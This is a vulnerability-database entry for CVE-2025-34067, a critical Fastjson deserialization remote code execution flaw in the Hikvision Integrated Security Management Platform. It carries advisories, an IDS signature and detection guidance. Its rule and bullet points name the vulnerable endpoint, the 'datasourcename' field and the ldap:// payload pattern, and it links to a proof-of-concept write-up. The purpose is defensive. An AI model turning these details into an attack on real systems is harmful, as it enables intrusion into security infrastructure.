CVE-2025-34067
published 2025-07-02CVE-2025-34067: An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the…
PriorityP189critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWVulnCheck KEV
Exploited in the wild
EPSS
18.67%
96.9th percentile
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hikvision | integrated_security_management_platform | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:26; content:"/bic/ssoService/v1/applyCT"; fast_pattern; http.request_body; content:"|22|datasourcename|22|"; content:"|22|ldap|3a 2f 2f|"; within:15; reference:url,www.sentinelone.com/vulnerability-database/cve-2025-34067/; reference:cve,2025-34067; classtype:attempted-admin; sid:2068368; rev:1; metadata:affected_product HikVision, attack_target Networking_Equipment, tls_state plaintext, created_at 2026_03_20, cve CVE_2025_34067, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2026_03_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|22|datasourcename|22| followed by |22|ldap|3a 2f 2f| within:15
- →Look for HTTP POST requests to the exact URI /bic/ssoService/v1/applyCT (exact byte length 26) — this is the vulnerable deserialization endpoint. ↗
- →Inspect POST request bodies for the JSON key 'datasourcename' containing an LDAP URL (ldap://) — this is the Fastjson auto-type payload pattern used to load a malicious remote class. ↗
- →Exploitation was actively observed in the wild as early as 2025-02-05 UTC; treat any hits on this signature as high-confidence active exploitation, not just scanning. ↗
- →Scanning/exploitation attempts against CVE-2025-34067 have been attributed to Iran-nexus threat actors using commercial VPN exit nodes (Mullvad, ProtonVPN, Surfshark, NordVPN) and VPS infrastructure — correlate source IPs against these VPN egress ranges. ↗
- →Monitor for Hikvision Integrated Security Management Platform devices initiating unexpected outbound LDAP connections — a successful exploit will cause the server to reach out to an attacker-controlled LDAP URL to fetch a malicious Java class. ↗
- →The Snort/Suricata rule SID 2068368 (ET, rev:1, created 2026-03-20) directly detects this exploit pattern and should be deployed at both perimeter and internal sensors.
- ·The Snort/Suricata rule only fires on plaintext (non-TLS) traffic; if the Hikvision platform is deployed behind TLS termination or a reverse proxy, the rule will not trigger and additional inspection at the TLS termination point is required. ↗
- ·The URI match uses an exact byte-size constraint (bsize:26); any URL encoding, path prefix variation, or proxy rewriting of the URI could bypass this specific signature.
CVSS provenance
nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ch97-xgvh-p6mh: An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due
ghsa_unreviewed·2025-07-02
CVE-2025-34067 [CRITICAL] CWE-502 GHSA-ch97-xgvh-p6mh: An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system.
VulnCheck
Deserialization of Untrusted Data
vulncheck·2025·CVSS 10.0
CVE-2025-34067 [CRITICAL] Deserialization of Untrusted Data
Deserialization of Untrusted Data
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.
Affected: Hikvision Integrated Security Management Platform
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remed
Suricata
ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)
suricata·2026-03-20·CVSS 10.0
CVE-2025-34067 [CRITICAL] ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)
ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:26; content:"/bic/ssoService/v1/applyCT"; fast_pattern; http.request_body; content:"|22|datasourcename|22|"; content:"|22|ldap|3a 2f 2f|"; within:15; reference:url,www.sentinelone.com/vulnerability-database/cve-2025-34067/; reference:cve,2025-34067; classtype:attempted-admin; sid:2068368; rev:1; metadata:affected_product HikVision, attack_target Networking_Equipment, tls_state plaintext, created_at 2026_03_20, cve CVE_2025_34067, deployment Perimeter, deploy
No public exploits indexed.
Tenable
Iranian-linked actors are engaging in disruptive attacks
blogs_tenable·2026-03-11
Iranian-linked actors are engaging in disruptive attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East
blogs_checkpoint·2026-03-04
CVE-2017-7921 Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East
## Key Findings
During the ongoing conflict, we identified intensified targeting of IP cameras f
https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.mdhttps://s4e.io/tools/hikvision-applyct-remote-code-executionhttps://vulncheck.com/advisories/hikvision-ismp-rce-applyct
2025-07-02
Published
Exploited in the wild